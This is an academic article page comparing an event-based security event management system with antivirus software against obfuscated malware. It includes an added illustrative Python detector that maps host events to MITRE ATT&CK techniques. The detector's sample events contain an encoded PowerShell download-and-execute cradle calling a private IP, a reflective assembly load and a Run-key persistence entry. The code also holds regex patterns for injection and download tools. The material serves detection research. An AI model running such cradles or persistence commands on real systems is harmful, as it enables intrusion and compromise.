Article

Evaluation of Local Security Event Management System vs. Standard Antivirus Software

Institute for Research in Technology, ICAI School of Engineering, Comillas Pontifical University, 28015 Madrid, Spain
* Author to whom correspondence should be addressed.
Academic Editors: George Drosatos, Konstantinos Rantos and Konstantinos Demertzis
Appl. Sci. 2022, 12(3), 1076; https://doi.org/10.3390/app12031076
Received: 24 December 2021 / Revised: 17 January 2022 / Accepted: 18 January 2022 / Published: 20 January 2022
(This article belongs to the Special Issue Advanced Technologies in Data and Information Security)
The detection and classification of threats in computer systems has long been one of the main problems studied in cybersecurity. As technology evolves, the tactics employed by adversaries have become more sophisticated in order to evade detection systems, and systems that previously detected and classified those threats are now outdated. This paper proposes a detection system based on the analysis of host events, assigning each detection a risk level by matching it against the MITRE ATT&CK matrix and the Cyber Kill Chain. Extensive attack testing was performed using nine malware samples, each combined with three different obfuscation techniques. Each malicious sample was analyzed with the proposed event management system and was also executed in a controlled environment to examine whether commercial malware detection products (antivirus software) detected it. The results show that evasion techniques such as obfuscation and in-memory extraction of malicious payloads pose unexpected difficulties for standard antivirus software.
Keywords: SIEM; antivirus; event-based threat detection; MITRE; Cyber Kill Chain
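The abstract describes the core idea of the proposed system: instead of scanning files for known signatures, it consumes host events, maps each suspicious event to a MITRE ATT&CK technique and a Cyber Kill Chain phase, and derives a risk level from how far along the kill chain the observed activity reaches. The following is an added illustration of that event-based approach and is not the authors' code or their rule set; the event format (`timestamp|event_id|process|detail`), the detection rules, the phase weights and the risk thresholds are assumptions chosen for the example. The ATT&CK technique IDs are real identifiers, and the sample events are constructed. It also shows why this style of detection is robust to the obfuscation the paper tests: a base64 `-EncodedCommand` payload is decoded and the rules are re-applied to the decoded content, so the download-and-execute behaviour hidden inside it is still attributed to a technique and a phase.

```python
"""Toy event-based detector: maps host events to MITRE ATT&CK techniques and
Cyber Kill Chain phases, then scores a session by the phases observed.
Illustrative only; rules, weights, thresholds and event format are assumptions."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Cyber Kill Chain phases in order; later phases weigh more in the score (assumption).
KILL_CHAIN = ["Reconnaissance", "Weaponization", "Delivery", "Exploitation",
              "Installation", "Command and Control", "Actions on Objectives"]


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str        # MITRE ATT&CK technique ID (real identifiers)
    phase: str            # Cyber Kill Chain phase (assumed mapping)
    pattern: re.Pattern   # matched against the event's detail field


# Illustrative rules; the regexes are deliberately simple.
RULES: List[Rule] = [
    Rule("encoded PowerShell command line", "T1059.001", "Exploitation",
         re.compile(r"powershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\s", re.I)),
    Rule("obfuscated / decoded-at-runtime payload", "T1027", "Exploitation",
         re.compile(r"FromBase64String|-bxor|Invoke-Expression|\biex\b", re.I)),
    Rule("in-memory loading or injection", "T1055", "Installation",
         re.compile(r"VirtualAlloc|WriteProcessMemory|CreateRemoteThread|Reflection\.Assembly", re.I)),
    Rule("Run-key persistence", "T1547.001", "Installation",
         re.compile(r"\\CurrentVersion\\Run\b", re.I)),
    Rule("HTTP download from script host", "T1071.001", "Command and Control",
         re.compile(r"Net\.WebClient|Invoke-WebRequest|DownloadString", re.I)),
]

# -EncodedCommand takes base64 of a UTF-16LE string; capture the base64 blob.
ENC_RE = re.compile(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'ts|event_id|process|detail' line (assumed format)."""
    parts = line.rstrip("\n").split("|", 3)
    if len(parts) != 4:
        raise ValueError(f"malformed event: {line!r}")
    return dict(zip(("ts", "event_id", "process", "detail"), parts))


def decode_encoded_command(detail: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if absent or undecodable."""
    m = ENC_RE.search(detail)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return ""


def match_event(event: Dict[str, str]) -> List[Rule]:
    """Rules hit by the raw detail field and, if present, by its decoded payload."""
    texts = [event["detail"]]
    decoded = decode_encoded_command(event["detail"])
    if decoded:
        texts.append(decoded)          # obfuscation does not hide the behaviour
    hits: List[Rule] = []
    for rule in RULES:
        if any(rule.pattern.search(t) for t in texts) and rule not in hits:
            hits.append(rule)
    return hits


def analyze(lines: List[str]) -> Dict[str, object]:
    """Aggregate findings over a session and derive a risk level from the phases seen."""
    findings: List[Tuple[str, str, str, str]] = []
    techniques: List[str] = []
    phases = set()
    for line in lines:
        ev = parse_event(line)
        for rule in match_event(ev):
            findings.append((ev["ts"], rule.technique, rule.phase, rule.name))
            if rule.technique not in techniques:
                techniques.append(rule.technique)
            phases.add(rule.phase)
    ordered = [p for p in KILL_CHAIN if p in phases]
    score = sum(KILL_CHAIN.index(p) + 1 for p in ordered)   # weight = phase position
    level = "high" if score >= 10 else "medium" if score >= 4 else "low" if score else "none"
    return {"findings": findings, "techniques": techniques,
            "phases": ordered, "score": score, "level": level}


# Constructed sample session (not from the paper). The first event carries an
# encoded command whose plaintext is built here so the reader can see it.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/p.ps1')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    f"2022-01-18T10:01:02|4688|powershell.exe|powershell.exe -nop -w hidden -enc {_ENC}",
    "2022-01-18T10:01:05|4104|powershell.exe|[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b)).EntryPoint.Invoke($null,$null)",
    "2022-01-18T10:01:09|13|reg.exe|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\updater = C:\\Users\\alice\\AppData\\Roaming\\u.exe",
    "2022-01-18T10:02:00|4688|notepad.exe|notepad.exe C:\\Users\\alice\\notes.txt",
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for ts, tech, phase, name in result["findings"]:
        print(f"{ts}  {tech:<10} {phase:<20} {name}")
    print("phases:", result["phases"], "score:", result["score"], "level:", result["level"])
```

Note that the benign `notepad.exe` event produces no finding, while the encoded PowerShell line yields three techniques (the encoded launch itself, the `IEX` in the decoded payload, and the HTTP download) because the decoded content is inspected rather than the opaque base64 string. Scoring by kill-chain phase rather than by raw hit count is what lets a session that reaches Installation and Command and Control rank above an isolated suspicious command line.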
MDPI and ACS Style

Pérez-Sánchez, A.; Palacios, R. Evaluation of Local Security Event Management System vs. Standard Antivirus Software. Appl. Sci. 2022, 12, 1076. https://doi.org/10.3390/app12031076
